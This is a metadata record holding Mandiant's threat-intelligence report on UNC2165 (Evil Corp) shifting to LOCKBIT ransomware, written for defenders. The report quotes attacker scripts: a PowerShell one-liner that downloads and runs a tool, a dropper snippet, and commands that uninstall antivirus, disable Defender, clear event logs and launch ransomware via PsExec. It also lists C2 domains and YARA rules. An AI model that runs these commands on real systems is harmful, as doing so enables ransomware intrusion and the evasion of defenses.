{ "id": "5431f020-e3a8-4eca-9f1a-ea8652c965ee", "created_at": "2026-04-06T00:11:35.298433Z", "updated_at": "2026-04-10T13:11:24.933552Z", "deleted_at": null, "sha1_hash": "6e9553c0cd65809465809a31b2814f4f26acbefd", "title": "To HADES and Back: UNC2165 Shifts to LOCKBIT to Evade Sanctions | Mandiant", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 181236, "plain_text": "To HADES and Back: UNC2165 Shifts to LOCKBIT to Evade Sanctions\r\n| Mandiant\r\nBy Mandiant\r\nPublished: 2022-06-02 · Archived: 2026-04-05 21:20:55 UTC\r\nWritten by: Mandiant Intelligence\r\nThe U.S. Treasury Department's Office of Foreign Assets Control (OFAC) sanctioned the entity known as Evil Corp in\r\nDecember 2019, citing the group's extensive development and use and control of the DRIDEX malware ecosystem. Since\r\nthe sanctions were announced, Evil Corp-affiliated actors appear to have continuously changed the ransomware they use\r\n(Figure 1). Specifically following an October 2020 OFAC advisory, there was a cessation of WASTEDLOCKER activity\r\nand the emergence of multiple closely related ransomware variants in relatively quick succession. These developments\r\nsuggested that the actors faced challenges in receiving ransom payments following their ransomware's public association\r\nwith Evil Corp.\r\nMandiant has investigated multiple LOCKBIT ransomware intrusions attributed to UNC2165, a financially motivated threat\r\ncluster that shares numerous overlaps with the threat group publicly reported as \"Evil Corp.\" UNC2165 has been active\r\nsince at least 2019 and almost exclusively obtains access into victim networks via the FAKEUPDATES infection chain,\r\ntracked by Mandiant as UNC1543. Previously, we have observed UNC2165 deploy HADES ransomware. Based on the\r\noverlaps between UNC2165 and Evil Corp, we assess with high confidence that these actors have shifted away from using\r\nexclusive ransomware variants to LOCKBIT—a well-known ransomware as a service (RaaS)—in their operations, likely to\r\nhinder attribution efforts in order to evade sanctions.\r\nFigure 1: Ransomware families believed to be associated with Evil Corp-affiliated actors (21-00014631)\r\nUNC2165 Overlaps with Evil Corp Activity\r\nOFAC sanctions against Evil Corp in December 2019 were announced in conjunction with the Department of Justice's\r\n(DOJ) unsealing of indictments against individuals for their roles in the Bugat malware operation, updated versions of which\r\nwere later called DRIDEX. DRIDEX was believed to operate under an affiliate model with multiple actors involved in the\r\ndistribution of the malware. While the malware was initially used as traditional banking Trojan, beginning as early as 2018,\r\nwe increasingly observed DRIDEX used as a conduit to deploy post-exploitation frameworks onto victim\r\nmachines. Security researchers also began to report DRIDEX preceding BITPAYMER deployments, which was consistent\r\nwith a broader emerging trend at the time of ransomware being deployed post-compromise in victim environments.\r\nAlthough Evil Corp was sanctioned for the development and distribution of DRIDEX, the group was already beginning to\r\nshift towards more lucrative ransomware operations.\r\nUNC2165 activity likely represents another evolution in Evil Corp affiliated actors' operations. Numerous reports have\r\nhighlighted the progression of linked activity including development of new ransomware families and a reduced reliance on\r\nDRIDEX to enable intrusions. Despite these apparent efforts to obscure attribution, UNC2165 has notable similarities to\r\noperations publicly attributed to Evil Corp, including a heavy reliance on FAKEUPDATES to obtain initial access to victims\r\nand overlaps in their infrastructure and use of particular ransomware families.\r\nUNC2165 has almost exclusively obtained initial access to victims' networks from UNC1543. UNC1543 is a\r\nfinancially motivated threat cluster that has distributed FAKEUPDATES since at least April 2018. In the months prior\r\nto the indictments, Mandiant reported on FAKEUPDATES being used as the initial infection vector for DRIDEX\r\ninfections that later resulted in the deployment of BITPAYMER or DOPPELPAYMER. \r\nUNC2165 has deployed HADES ransomware, which has code and functional similarities to other ransomware\r\nbelieved to be associated with Evil Corp-affiliated threat actors.\r\nhttps://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions\r\nPage 1 of 8\n\nUNC2165-attributed BEACON payloads and command and control (C\u0026C) servers have also been publicly reported\r\nby other security vendors in association with suspected Evil Corp activity (Table 1).\r\nBEACON C\u0026C\r\nmwebsoft[.]comrostraffic[.]comconsultane[.]comtraffichi[.]comamazingdonutco[.]comcofeedback[.]comadsmarketart[.]comwebsitelistbuilder[.]comadv\r\ncutyoutube[.]comonlinemoula[.]com\r\npotasip[.]comadvancedanalysis[.]befirsino[.]comcurrentteach[.]comnewschools[.]infoadsmarketart[.]com\r\nTable 1: Examples of UNC2165 BEACON C\u0026C servers reported by others as Evil Corp\r\nOverlaps With “SilverFish” Reporting\r\nhttps://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions\r\nPage 2 of 8\n\nUNC2165 also has overlaps with a cluster of activity dubbed \"SilverFish\" by ProDaft. Mandiant reviewed the information in\r\nthis report and determined that the analyzed malware administration panel is used to manage FAKEUPDATES infections\r\nand to distribute secondary payloads, including BEACON. We believe that at least some of the described activity can be\r\nattributed to UNC2165 based on malware payloads and other technical artifacts included in the report.\r\nA command appearing in a screenshot within the ProDaft report is consistent with UNC2165 activity. This command\r\nreportedly executes a BEACON payload that communicates with the C\u0026C domain  tanzaniafisheries[.]com  from\r\na  .csproj  file using  msbuild.exe . We attribute this BEACON C\u0026C domain to UNC2165 and have routinely\r\nobserved UNC2165 leveraging this same technique to load BEACON shellcode payloads via  .csproj  files. The\r\nexecution of this command via the FAKEUPDATES C\u0026C server suggests that UNC2165 has at least some level of\r\naccess to the admin panel to execute commands and launch payloads post-compromise.\r\nSince June 2020 all BEACON payloads that we have observed delivered via FAKEUPDATES have been\r\nattributed to UNC2165 based on their ownership by a common bulletproof hosting client and observed post-exploitation TTPs.\r\nFAKEUDPATES has also delivered NETSUPPORT during this period, but we do not currently attribute this\r\nactivity to UNC2165. NETSUPPORT is most likely used to monetize infections on machines belonging to\r\nindividuals rather than organizations by stealing credentials and other sensitive personal information.\r\nThe ProDaft report contains an image that shows secondary payloads are uploaded directly in the panel and\r\nreferenced by a file ID number. The script that we have seen loading COLORFAKE is consistent with this activity as\r\nit includes the following reference  fileid = '\u003cnumber\u003e'(e.g. var fileid = '190').\r\nAttack Lifecycle\r\nWhile UNC2165 activity dates to at least June 2020, the following TTPs are focused on intrusions where we directly\r\nobserved ransomware deployed.\r\nInitial Compromise and Establish Foothold\r\nUNC2165 has primarily gained access to victim organizations via FAKEUPDATES infections that ultimately deliver loaders\r\nto deploy BEACON samples on impacted hosts. The loader portion of UNC2165 Cobalt Strike payloads have changed\r\nfrequently but they have continually used BEACON in most intrusions since 2020. Beyond FAKEUPDATES, we have also\r\nobserved UNC2165 leverage suspected stolen credentials to obtain initial access.\r\nDuring 2021, UNC2165 leveraged publicly available loaders, including DONUT, to deploy BEACON payloads;\r\nhowever, intrusions observed since late 2021 have used the COLORFAKE (aka Blister) dropper.\r\nIn recent UNC2165 intrusions where COLORFAKE was used, we recovered JavaScript artifacts showing the initial\r\ndelivery of COLORFAKE payloads via FAKEUPDATES. The payloads to be downloaded each have a \"fileid\" value\r\nthat FAKEUPDATES will retrieve and write to disk (Figure 2).\r\nThe COLORFAKE DLL is placed within  %ProgramData%  as a  .tmp  file, renamed to a DLL, and\r\nsubsequently executed by RunDLL32 with its export function.\r\nvar filename = 'VIDRESZR1.dll';\r\nvar fileid = '190';\r\nvar replyContent = getFileContentByFileId(fileid);\r\nvar folder = wsh.ExpandEnvironmentStrings('%programdata%');\r\nvar tempFileName = '';\r\ndo {\r\n tempFileName = fso.BuildPath(folder, fso.GetTempName());\r\n} while ( fso.FileExists(tempFileName) );\r\nwriteContentToFile(tempFileName, replyContent);\r\nwsh.Run('cmd /C rename \"'+tempFileName+'\" \"'+filename+'\"', 0, true);\r\nFigure 2: Deployment of COLORFAKE loader\r\nEscalate Privileges\r\nUNC2165 has taken multiple common approaches to privilege escalation across its intrusions, including Mimikatz and\r\nKerberoasting attacks, targeting authentication data stored in the Windows registry, and searching for documents or files\r\nassociated with password managers or that may contain plaintext credentials.\r\nUNC2165 has used a service account to extract copies of the Windows SECURITY registry hives.\r\nUNC2165 has used Mimikatz and performed Kerberoasting attacks to obtain extensive credential access in target\r\nenvironments. Kerberos data output files generated by UNC2165 are typically placed in the  %ProgramData%  root\r\ndirectory (Figure 3). The threat actors also test the acquired credentials across the target domain to identify where\r\nthey will work.\r\nhttps://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions\r\nPage 3 of 8\n\nUNC2165 has searched for terms including keep, avamar, kdb, netapp, pass, and passw to identify files or systems\r\nthat may contain credentials or sensitive data for exfiltration purposes. Additionally, the threat actors have directly\r\naccessed and exported passwords from enterprise password managers.\r\nUNC2165 has used tools, including KEETHIEF/KEETHEFT and SecretServerSecretStealer, to gather key material\r\nfrom KeePass and decrypt secrets from Thycotic Secret Server\r\ncmd.exe /C cmd /c powershell -nop -exec bypass -c iex(new-object net.webclient).downloadstring('https://raw.githubusercon\r\nFigure 3: UNC2165 downloads Kerberoasting utility from GitHub\r\nInternal Reconnaissance\r\nFollowing UNC1543 FAKEUPDATES infections, we commonly see a series of built-in Microsoft Windows utilities such\r\nas whoami, nltest, cmdkey, and net used against newly accessed systems to gather data and learn more about the victim\r\nenvironment. The majority of these commands are issued using one larger, semicolon-delineated list of enumeration\r\ncommands, followed up by additional PowerShell reconnaissance (Figure 4). We attribute this initial reconnaissance activity\r\nto UNC1543 as it occurs prior to UNC2165 BEACON deployment; however, collected information almost certainly enables\r\ndecision-making for UNC2165. During intrusions, UNC2165 has used multiple common third-party tools to enable\r\nreconnaissance of victim networks and has accessed internal systems to obtain information used to guide its intrusion\r\noperations.\r\nIn one intrusion UNC2165 downloaded and executed the Advanced Port Scanner utility.\r\nUNC2165 has downloaded and installed the asset management tool Lansweeper.\r\nUNC2165 has accessed a victim's VMware VCenter, which provided information about host configurations, clusters,\r\nand storage devices in the organization's virtualization environment.\r\nUNC2165 accessed a TrendMicro OfficeScan management console and viewed admin roles and other configuration\r\ninformation.\r\ncmd.exe /C powershell /c nltest /dclist: ; nltest /domain_trusts ; cmdkey /list ; net group 'Domain Admins' /domain ; net\r\ncmd.exe /C powershell /c \"Get-WmiObject win32_service -ComputerName localhost | Where-Object {$_.PathName -notmatch 'c:\\\\w\r\nFigure 4: UNC1543 reconnaissance commands; common precursor to UNC2165\r\nLateral Movement and Maintain Presence\r\nUNC2165 relies heavily on Cobalt Strike BEACON to enable lateral movement and maintain presence in a victim\r\nenvironment. Beyond its use of BEACON, UNC2165 has also used common administrative protocols and software to enable\r\nlateral movement, including RDP and SSH.\r\nThe threat actors connected via SSH to enterprise storage systems using PuTTy.\r\nUNC2165 has moved laterally within victim environments via RDP.\r\nIn support of both persistence and lateral movement, UNC2165 has created local system accounts and added them to\r\ngroups including local administrator and RDP users.\r\nIn at least one case, UNC2165 maintained access to a victim environment via its corporate VPN infrastructure.\r\nComplete Mission\r\nIn most cases, UNC2165 has stolen data from its victims to use as leverage for extortion after it has deployed ransomware\r\nacross an environment. In intrusions where the data exfiltration method could be identified, there is evidence to suggest the\r\ngroup used either Rclone or MEGASync to transfer data from the victims' environments prior to encryption. The Rclone\r\nutility is used by many financially motivated actors to synchronize sensitive files with cloud storage providers, and\r\nMEGASync synchronizes data to the MEGA cloud hosting service.\r\n UNC2165 has leveraged multiple Windows batch scripts during the final phases of its operations to deploy ransomware and\r\nmodify systems to aid the ransomware's propagation. We have observed UN2165 use both HADES and LOCKBIT; we have\r\nnot seen these threat actors use HADES since early 2021. Notably, LOCKBIT is a prominent Ransomware-as-a-Service\r\n(RaaS) affiliate program, which we track as UNC2758, that has been advertised in underground forums since early 2020\r\n(21-00026166).\r\nUNC2165 uses a script that forces Group Policy updates and adds all files with EXE, BAT, or DLL extensions and\r\nthe  C:\\Programdata\\  and  C:\\Windows\\  directories to the Windows Defender exclusions list (Figure 5).\r\nUNC2165 scripts have also used WMI to stop and uninstall anti-virus products and other Windows Services prior to\r\nransomware deployment (Figure 6).\r\nUNC2165 has used scripts to modify multiple Windows Registry keys with an aim to remove some barriers to\r\nransomware execution and disable utilities commonly used by administrators such as the Windows task manager,\r\nregistry tools, and the command prompt (Figure 7).\r\nhttps://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions\r\nPage 4 of 8\n\nUNC2165 has employed a ransomware execution script that initiates the encryption process using PSEXEC. This\r\nscript also disables Windows Defender and clears the Windows event logs (Figure 8).\r\ngpupdate /force\r\npowershell.exe -command Add-MpPreference -ExclusionExtension \".bat\"\r\npowershell.exe -command Add-MpPreference -ExclusionExtension \".exe\"\r\npowershell.exe -command Add-MpPreference -ExclusionExtension \".dll\"\r\npowershell.exe -command Add-MpPreference -ExclusionPath \"C:\\Programdata\\\"\r\npowershell.exe -command Add-MpPreference -ExclusionPath \"C:\\Windows\\\u003e\"\r\nFigure 5: Sample script forcing Group Policy update\r\nwmic product where name=\"CarbonBlack Sensor\" call uninstall /nointeractive\r\nwmic product where name=\"Carbon Black Sensor\" call uninstall /nointeractive\r\nwmic product where name=\"Carbon Black Cloud Sensor 64-bit\" call uninstall /nointeractive\r\nwmic product where name=\"CarbonBlack Cloud Sensor 64-bit\" call uninstall /nointeractive\r\nwmic product where name=\"Cb Defense Sensor 64-bit\" call uninstall /nointeractive\r\nwmic product where \"name like '%%Cb Defense%%'\" call uninstall /nointeractive\r\nwmic product where name=\"Dell Threat Defense\" call uninstall /nointeractive\r\nwmic product where name=\"Cylance PROTECT\" call uninstall /nointeractive\r\nwmic product where name=\"Cylance Unified Agent\" call uninstall /nointeractive\r\nwmic product where name=\"Cylance PROTECT - Dell Plugins\" call uninstall /nointeractive\r\nwmic product where name=\"Microsoft Security Client\" call uninstall /nointeractive\r\nwmic product where name=\"LogRhythm System Monitor Service\" call uninstall /nointeractive\r\nwmic product where name=\"Microsoft Endpoint Protection Management Components\" call uninstall /nointeractive\r\nwmic service where \"caption like '%%LogRhythm%%'\" call stopservice\r\nwmic service where \"caption like '%%SQL%%'\" call stopservice\r\nwmic service where \"caption like '%%Exchange%%'\" call stopservice\r\nwmic service where \"caption like '%%Malwarebytes%%'\" call stopservice\r\nFigure 6: Sample script to uninstall antivirus products\r\n reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\" /f /v \"HidePowerOptions\" /t REG_DWORD /d 1\r\nreg add \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\" /f /v \"HidePowerOptions\" /t REG_DWORD /d 1\r\nreg add \"HKCU\\Software\\Policies\\Microsoft\\Windows\\Explorer\" /f /v \"DisableNotificationCenter\" /t REG_DWORD /d 1\r\nreg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\PushNotifications\" /f /v \"ToastEnabled\" /t REG_DWORD /d 0\r\nreg add \"hklm\\system\\currentcontrolset\\control\\Storage\" /f /v \"write Protection\" /t REG_DWORD /d 0\r\nreg add \"hklm\\system\\currentcontrolset\\control\\StorageDevicePolicies\" /f /v \"writeprotect\" /t REG_DWORD /d 0\r\nreg add \"hklm\\system\\currentcontrolset\\Services\\LanmanServer\\Parameters\" /f /v \"AutoShareWks\" /t REG_DWORD /d 1\r\nreg add \"hklm\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\system\" /f /v \"LocalAccountTokenFilterPolicy\" /t REG_DWOR\r\nreg add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\UX Configuration\" /v \"Notification_Suppress\" /t REG_DWORD /d \"\r\nreg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\" /v \"DisableTaskMgr\" /t REG_DWORD /d \"1\" /f\r\nreg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\" /v \"DisableCMD\" /t REG_DWORD /d \"1\" /f\r\nreg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\" /v \"DisableRegistryTools\" /t REG_DWORD /d \"1\" /f\r\nreg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\" /v \"NoRun\" /t REG_DWORD /d \"1\" /f\r\nFigure 7: Sample script to edit the Windows Registry\r\ncd c:\\\u0026PsExec.exe -accepteula -d -h -high -u .\\\u003cUSERNAME\u003e -p \"\u003cPASSWORD\u003e\" c:\\\u003cRANSOMWARE_BINARY\u003e.exe\r\ncd c:\\\u0026PsExec.exe -accepteula -d -h -i -high -u .\\\u003cUSERNAME\u003e -p \"\u003cPASSWORD\u003e\" c:\\\u003cRANSOMWARE_BINARY\u003e.exe\r\ncd c:\\\u0026PsExec.exe -accepteula -d -h -u .\\\u003cUSERNAME\u003e -p \"\u003cPASSWORD\u003e\" c:\\\u003cRANSOMWARE_BINARY\u003e.exe\r\ncd c:\\\u0026PsExec.exe -accepteula -d -h -i -u .\\\u003cUSERNAME\u003e -p \"\u003cPASSWORD\u003e\" c:\\\u003cRANSOMWARE_BINARY\u003e.exe\r\ntasklist | findstr /i \u003cRANSOMWARE_BINARY\u003e \u003e \\\\\u003cREDACTED\u003e\\\u003cREDACTED\u003e\\\u003cREDACTED\u003e\\%COMPUTERNAME%.txt\r\ncmd.exe /c \"C:\\Program Files\\Windows Defender\\MpCmdRun.exe\" -RemoveDefinitions -All\r\nsc stop WinDefend\r\nsc config WinDefend start= disabled\r\nsc delete WinDefend\r\nfor /F \"tokens=*\" %%1 in ('wevtutil.exe el') DO wevtutil.exe cl \"%%1\"\r\nFigure 8: Sample script to execute LOCKBIT binary\r\nPossibly Affiliated Threat Actor\r\nBased on information from trusted sensitive sources and underground forum activity, we have moderate confidence that a\r\nparticular actor operating on underground forums is affiliated with UNC2165. Additional details are available in Mandiant\r\nAdvantage.\r\nhttps://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions\r\nPage 5 of 8\n\nMandiant has previously highlighted a cluster of BEACON C\u0026C services hosted on yalishanda's bulletproof hosting\r\nservice that we believe is operated by a common threat actor. Information gleaned from trusted, sensitive sources\r\nrevealed that account information associated with this client has also been used by the actor in underground forums.\r\nThis actor’s underground forum activity is consistent with TTPs used in UNC2165 operations.\r\nIn April 2022, the actor appeared to purchase VPN access to a wholesale distribution company with an annual\r\nrevenue of $3 billion USD and has expressed interest in purchasing additional network accesses. Although\r\nless common, we have seen UNC2165 use suspected stolen credentials in intrusions. \r\nBetween December 2019 and August 2020, the actor posted at least twice on  exploit[.]in  seeking to\r\npurchase versions of Cobalt Strike.\r\nBeginning in July 2019, they have made several posts on  exploit[.]in  seeking services and tools for\r\nobfuscating malware to avoid detection. \r\nWe also identified a GitHub profile matching the actor’s username, and while the account’s activity is limited, it is\r\nconsistent with UNC2165 operations. Most notably, the actor opened an issue for a project in which they included\r\ncommand line arguments showing that they were attempting to build a  .csproj  shellcode runner. UNC2165\r\nused  .csproj  files extensively during this time period to deploy BEACON payloads and has\r\nleveraged  .csproj  files to deploy BEACON that are consistent with the project for which the issue was opened.\r\nImplications\r\nThe U.S. Government has increasingly leveraged sanctions as a part of a broader toolkit to tackle ransomware operations.\r\nThis has included sanctions on both actors directly involved in ransomware operations as well as cryptocurrency exchanges\r\nthat have received illicit funds. These sanctions have had a direct impact on threat actor operations, particularly as at least\r\nsome companies involved in ransomware remediation activities, such as negotiation, refuse to facilitate payments to known\r\nsanctioned entities. This can ultimately reduce threat actors' ability to be paid by victims, which is the primary driver of\r\nransomware operations.\r\nThe adoption of an existing ransomware is a natural evolution for UNC2165 to attempt to obscure their affiliation with Evil\r\nCorp. Both the prominence of LOCKBIT in recent years and its successful use by several different threat clusters likely\r\nmade the ransomware an attractive choice. Using this RaaS would allow UNC2165 to blend in with other affiliates,\r\nrequiring visibility into earlier stages of the attack lifecycle to properly attribute the activity, compared to prior operations\r\nthat may have been attributable based on the use of an exclusive ransomware. Additionally, the frequent code updates and\r\nrebranding of HADES required development resources and it is plausible that UNC2165 saw the use of LOCKBIT as a more\r\ncost-effective choice. The use of a RaaS would eliminate the ransomware development time and effort allowing resources to\r\nbe used elsewhere, such as broadening ransomware deployment operations. Its adoption could also temporarily afford the\r\nactors more time to develop a completely new ransomware from scratch, limiting the ability of security researchers to easily\r\ntie it to previous Evil Corp operations.\r\nIt is plausible that the actors behind UNC2165 operations will continue to take additional steps to distance themselves from\r\nthe Evil Corp name. For example, the threat actors could choose to abandon their use of FAKEUPDATES, an operation with\r\nwell-documented links to Evil Corp actors in favor of a newly developed delivery vector or may look to acquire access from\r\nunderground communities. Some evidence of this developing trend already exists given UNC2165 has leveraged stolen\r\ncredentials in a subset of intrusions, which is consistent with a suspected member’s underground forum activity. We expect\r\nthese actors as well as others who are sanctioned in the future to take steps such as these to obscure their identities in order\r\nto ensure that it is not a limiting factor to receiving payments from victims.\r\nTechnical Appendix\r\nMITRE ATT\u0026CK Mapping  \r\nMandiant has observed UNC2165 use the following techniques.\r\nImpact\r\nT1486: Data Encrypted for ImpactT1489: Service StopT1490: Inhibit System RecoveryT1529: System Shutdown/Reboot\r\nDefense Evasion\r\nT1027: Obfuscated Files or InformationT1027.005: Indicator Removal from ToolsT1036: MasqueradingT1055: Process\r\nInjectionT1055.002: Portable Executable InjectionT1070.001: Clear Windows Event LogsT1070.004: File\r\nDeletionT1070.005: Network Share Connection RemovalT1070.006: TimestompT1078: Valid AccountsT1112: Modify\r\nRegistryT1127.001: MSBuildT1134: Access Token ManipulationT1134.001: Token Impersonation/TheftT1140:\r\nDeobfuscate/Decode Files or InformationT1202: Indirect Command ExecutionT1218.005: MshtaT1218.011:\r\nRundll32T1497: Virtualization/Sandbox EvasionT1497.001: System ChecksT1553.002: Code SigningT1562.001: Disable\r\nor Modify ToolsT1562.004: Disable or Modify System FirewallT1564.003: Hidden WindowT1620: Reflective Code\r\nLoading\r\nCommand and Control\r\nhttps://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions\r\nPage 6 of 8\n\nT1071: Application Layer ProtocolT1071.001: Web ProtocolsT1071.004: DNST1090.004: Domain FrontingT1095: Non-Application Layer ProtocolT1105: Ingress Tool TransferT1573.002: Asymmetric Cryptography\r\nCollection\r\nT1056.001: KeyloggingT1113: Screen CaptureT1115: Clipboard DataT1560: Archive Collected DataT1602.002: Network\r\nDevice Configuration Dump\r\nDiscovery\r\nT1007: System Service DiscoveryT1010: Application Window DiscoveryT1012: Query RegistryT1016: System Network\r\nConfiguration DiscoveryT1033: System Owner/User DiscoveryT1049: System Network Connections DiscoveryT1057:\r\nProcess DiscoveryT1069: Permission Groups DiscoveryT1069.001: Local GroupsT1069.002: Domain GroupsT1082:\r\nSystem Information DiscoveryT1083: File and Directory DiscoveryT1087: Account DiscoveryT1087.001: Local\r\nAccountT1087.002: Domain AccountT1482: Domain Trust DiscoveryT1518: Software DiscoveryT1614.001: System\r\nLanguage Discovery\r\nLateral Movement\r\nT1021.001: Remote Desktop ProtocolT1021.002: SMB/Windows Admin SharesT1021.004: SSH\r\nExfiltration\r\nT1020: Automated Exfiltration\r\nExecution\r\nT1047: Windows Management InstrumentationT1053: Scheduled Task/JobT1053.005: Scheduled TaskT1059: Command\r\nand Scripting InterpreterT1059.001: PowerShellT1059.003: Windows Command ShellT1059.005: Visual BasicT1059.007:\r\nJavaScriptT1569.002: Service Execution\r\nPersistence\r\nT1098: Account ManipulationT1136: Create AccountT1136.001: Local AccountT1543.003: Windows ServiceT1547.001:\r\nRegistry Run Keys / Startup FolderT1547.009: Shortcut Modification\r\nCredential Access\r\nT1003.001: LSASS MemoryT1003.002: Security Account ManagerT1552.002: Credentials in RegistryT1558: Steal or\r\nForge Kerberos TicketsT1558.003: Kerberoasting\r\nInitial Access\r\nT1133: External Remote ServicesT1189: Drive-by Compromise\r\nResource Development\r\nT1588.003: Code Signing CertificatesT1588.004: Digital CertificatesT1608.003: Install Digital Certificate\r\nLOCKBIT YARA Rules\r\nThe following YARA rules are not intended to be used on production systems or to inform blocking rules without first being\r\nvalidated through an organization's own internal testing processes to ensure appropriate performance and limit the risk of\r\nfalse positives. These rules are intended to serve as a starting point for hunting efforts to identify LOCKBIT activity;\r\nhowever, they may need adjustment over time if the malware family changes.\r\nrule LOCKBIT_Note_PE_v1\r\n{\r\n strings:\r\n $onion = /http:\\/\\/lockbit[a-z0-9]{9,49}.onion/ ascii wide\r\n $note1 = \"restore-my-files.txt\" nocase ascii wide\r\n $note2 = /lockbit[_-](ransomware|note)\\.hta/ nocase ascii wide\r\n $v2 = \"LockBit_2_0_Ransom\" nocase wide\r\n condition:\r\n (uint16(0) == 0x5A4D) and (uint32(uint32(0x3C)) == 0x00004550)\r\n and $onion\r\n and (all of ($note*)) and not $v2\r\nFigure 9: LOCKBIT YARA rule detects PE files with strings related to LOCKBIT v1 ransom notes\r\nrule LOCKBIT_Note_PE_v2\r\n{\r\nhttps://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions\r\nPage 7 of 8\n\nstrings:\r\n $onion = /http:\\/\\/lockbit[a-z0-9]{9,49}.onion/ ascii wide\r\n $note1 = \"restore-my-files.txt\" nocase ascii wide\r\n $note2 = /lockbit[_-](ransomware|note)\\.hta/ nocase ascii wide\r\n $v2 = \"LockBit_2_0_Ransom\" nocase wide\r\n condition:\r\n (uint16(0) == 0x5A4D) and (uint32(uint32(0x3C)) == 0x00004550) and all of them\r\n}\r\nFigure 10: LOCKBIT YARA rule detects PE files with strings related to LOCKBIT 2.0 ransom notes\r\nPosted in\r\nThreat Intelligence\r\nSecurity \u0026 Identity\r\nSource: https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions\r\nhttps://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions\r\nPage 8 of 8", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia", "ETDA" ], "origins": [ "web" ], "references": [ "https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions" ], "report_names": [ "unc2165-shifts-to-evade-sanctions" ], "threat_actors": [ { "id": "8670f370-1865-4264-9a1b-0dfe7617c329", "created_at": "2022-10-25T16:07:23.69953Z", "updated_at": "2026-04-10T02:00:04.716126Z", "deleted_at": null, "main_name": "Hades", "aliases": [ "Operation TrickyMouse" ], "source_name": "ETDA:Hades", "tools": [ "Brave Prince", "Gold Dragon", "GoldDragon", "Lovexxx", "Olympic Destroyer", "Running RAT", "RunningRAT", "SOURGRAPE", "running_rat" ], "source_id": "ETDA", "reports": null }, { "id": "50068c14-343c-4491-b568-df41dd59551c", "created_at": "2022-10-25T15:50:23.253218Z", "updated_at": "2026-04-10T02:00:05.234464Z", "deleted_at": null, "main_name": "Indrik Spider", "aliases": [ "Indrik Spider", "Evil Corp", "Manatee Tempest", "DEV-0243", "UNC2165" ], "source_name": "MITRE:Indrik Spider", "tools": [ "Mimikatz", "PsExec", "Dridex", "WastedLocker", "BitPaymer", "Cobalt Strike" ], "source_id": "MITRE", "reports": null }, { "id": "ebc139d2-7450-46f5-a9e4-e7d561133fa5", "created_at": "2024-04-24T02:00:49.453475Z", "updated_at": "2026-04-10T02:00:05.321256Z", "deleted_at": null, "main_name": "Mustard Tempest", "aliases": [ "Mustard Tempest", "DEV-0206", "TA569", "GOLD PRELUDE", "UNC1543" ], "source_name": "MITRE:Mustard Tempest", "tools": [ "SocGholish", "Cobalt Strike" ], "source_id": "MITRE", "reports": null }, { "id": "b296f34c-c424-41da-98bf-90312a5df8ef", "created_at": "2024-06-19T02:03:08.027585Z", "updated_at": "2026-04-10T02:00:03.621193Z", "deleted_at": null, "main_name": "GOLD DRAKE", "aliases": [ "Evil Corp", "Indrik Spider ", "Manatee Tempest " ], "source_name": "Secureworks:GOLD DRAKE", "tools": [ "BitPaymer", "Cobalt Strike", "Covenant", "Donut", "Dridex", "Hades", "Koadic", "LockBit", "Macaw Locker", "Mimikatz", "Payload.Bin", "Phoenix CryptoLocker", "PowerShell Empire", "PowerSploit", "SocGholish", "WastedLocker" ], "source_id": "Secureworks", "reports": null }, { "id": "3bf456e4-84ee-48fd-b3ab-c10d54a48a34", "created_at": "2024-06-19T02:03:08.096988Z", "updated_at": "2026-04-10T02:00:03.82859Z", "deleted_at": null, "main_name": "GOLD PRELUDE", "aliases": [ "Mustard Tempest ", "TA569 ", "UNC1543 " ], "source_name": "Secureworks:GOLD PRELUDE", "tools": [ "SocGholish" ], "source_id": "Secureworks", "reports": null }, { "id": "9806f226-935f-48eb-b138-6616c9bb9d69", "created_at": "2022-10-25T16:07:23.73153Z", "updated_at": "2026-04-10T02:00:04.729977Z", "deleted_at": null, "main_name": "Indrik Spider", "aliases": [ "Blue Lelantos", "DEV-0243", "Evil Corp", "G0119", "Gold Drake", "Gold Winter", "Manatee Tempest", "Mustard Tempest", "UNC2165" ], "source_name": "ETDA:Indrik Spider", "tools": [ "Advanced Port Scanner", "Agentemis", "Babuk", "Babuk Locker", "Babyk", "BitPaymer", "Bugat", "Bugat v5", "Cobalt Strike", "CobaltStrike", "Cridex", "Dridex", "EmPyre", "EmpireProject", "FAKEUPDATES", "FakeUpdate", "Feodo", "FriedEx", "Hades", "IEncrypt", "LINK_MSIEXEC", "MEGAsync", "Macaw Locker", "Metasploit", "Mimikatz", "PayloadBIN", "Phoenix Locker", "PowerShell Empire", "PowerSploit", "PsExec", "QNAP-Worm", "Raspberry Robin", "RaspberryRobin", "SocGholish", "Vasa Locker", "WastedLoader", "WastedLocker", "cobeacon", "wp_encrypt" ], "source_id": "ETDA", "reports": null }, { "id": "6c4f98b3-fe14-42d6-beaa-866395455e52", "created_at": "2023-01-06T13:46:39.169554Z", "updated_at": "2026-04-10T02:00:03.23458Z", "deleted_at": null, "main_name": "Evil Corp", "aliases": [ "GOLD DRAKE" ], "source_name": "MISPGALAXY:Evil Corp", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "544cac23-af15-4100-8f20-46c07962cbfa", "created_at": "2023-01-06T13:46:39.484133Z", "updated_at": "2026-04-10T02:00:03.34364Z", "deleted_at": null, "main_name": "GOLD PRELUDE", "aliases": [ "TA569", "UNC1543" ], "source_name": "MISPGALAXY:GOLD PRELUDE", "tools": [ "FakeUpdates", 